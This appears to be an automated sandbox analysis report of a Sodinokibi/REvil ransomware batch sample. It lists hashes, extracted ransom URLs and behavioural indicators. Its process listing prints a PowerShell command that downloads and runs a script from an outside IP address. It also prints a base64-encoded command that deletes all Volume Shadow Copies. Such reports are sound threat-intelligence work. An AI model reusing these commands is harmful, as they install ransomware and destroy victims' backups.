Analysis
-
max time kernel
137s -
max time network
53s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
08-06-2020 00:10
Static task
static1
Behavioral task
behavioral1
Sample
30c96bd5d55b4ede2ca100b6224868a5.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
30c96bd5d55b4ede2ca100b6224868a5.bat
Resource
win10v200430
General
-
Target
30c96bd5d55b4ede2ca100b6224868a5.bat
-
Size
213B
-
MD5
5ae8dd965aa55e41ed206290cfbb9a9c
-
SHA1
6d948a52ac79ff84600ee780122920ddd586ca62
-
SHA256
2f7e36eabad58aa80b8ad798095771fcbd5670e8d4684ae942666ce2a086bb24
-
SHA512
0dde15a4d13e9cbb065df025ede606e37de6f6be2fa55495891694f564a4b776884fa1eaa2b7d44cbdac9d79cb24d1d5f16ffc8d347fc3626de2959515420629
Malware Config
Extracted
http://185.103.242.78/pastes/30c96bd5d55b4ede2ca100b6224868a5
Extracted
C:\3b8h58-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D04A4DF1C363A8E8
http://decryptor.cc/D04A4DF1C363A8E8
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1480 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sc2fifaa88c0o.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1400 wrote to memory of 1480 1400 cmd.exe powershell.exe PID 1480 wrote to memory of 1352 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1352 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1352 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1352 1480 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1352 powershell.exe Token: SeBackupPrivilege 792 vssvc.exe Token: SeRestorePrivilege 792 vssvc.exe Token: SeAuditPrivilege 792 vssvc.exe Token: SeTakeOwnershipPrivilege 1480 powershell.exe -
Drops file in Program Files directory 36 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\microsoft sql server compact edition\v3.5\3b8h58-readme.txt powershell.exe File opened for modification \??\c:\program files\ApproveEnter.vst powershell.exe File opened for modification \??\c:\program files\LimitUpdate.wav powershell.exe File opened for modification \??\c:\program files\StepMerge.mp4 powershell.exe File opened for modification \??\c:\program files\SubmitRead.jtx powershell.exe File opened for modification \??\c:\program files\SaveDisconnect.avi powershell.exe File opened for modification \??\c:\program files\SplitPublish.docm powershell.exe File opened for modification \??\c:\program files\WatchSend.vstm powershell.exe File opened for modification \??\c:\program files\RedoPing.mp4 powershell.exe File opened for modification \??\c:\program files\UnregisterReceive.mpg powershell.exe File opened for modification \??\c:\program files\MeasureLock.TTS powershell.exe File opened for modification \??\c:\program files\NewHide.ini powershell.exe File opened for modification \??\c:\program files\SearchLock.jpg powershell.exe File opened for modification \??\c:\program files\DisableFind.MTS powershell.exe File opened for modification \??\c:\program files\ExpandSwitch.xlsm powershell.exe File opened for modification \??\c:\program files\JoinConvertFrom.mp3 powershell.exe File opened for modification \??\c:\program files\OutCheckpoint.xltm powershell.exe File opened for modification \??\c:\program files\RedoRestore.ini powershell.exe File opened for modification \??\c:\program files\SaveProtect.xlsm powershell.exe File opened for modification \??\c:\program files\SyncResize.emf powershell.exe File opened for modification \??\c:\program files\UninstallExpand.mp2v powershell.exe File opened for modification \??\c:\program files\BackupLimit.rtf powershell.exe File opened for modification \??\c:\program files\DismountOptimize.7z powershell.exe File created \??\c:\program files\3b8h58-readme.txt powershell.exe File opened for modification \??\c:\program files\UnpublishRepair.xls powershell.exe File opened for modification \??\c:\program files\CompareAssert.potm powershell.exe File opened for modification \??\c:\program files\MeasureTrace.js powershell.exe File opened for modification \??\c:\program files\MeasureInitialize.3gp powershell.exe File created \??\c:\program files\microsoft sql server compact edition\3b8h58-readme.txt powershell.exe File opened for modification \??\c:\program files\SuspendConvertFrom.xla powershell.exe File opened for modification \??\c:\program files\TraceCheckpoint.vsx powershell.exe File opened for modification \??\c:\program files\UndoAssert.ex_ powershell.exe File opened for modification \??\c:\program files\UninstallEnable.3g2 powershell.exe File created \??\c:\program files (x86)\3b8h58-readme.txt powershell.exe File opened for modification \??\c:\program files\AddResize.M2V powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\3b8h58-readme.txt powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1480 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1352 powershell.exe 1352 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\30c96bd5d55b4ede2ca100b6224868a5.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/30c96bd5d55b4ede2ca100b6224868a5');Invoke-BEQEFP;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
PID:1480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1352
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:792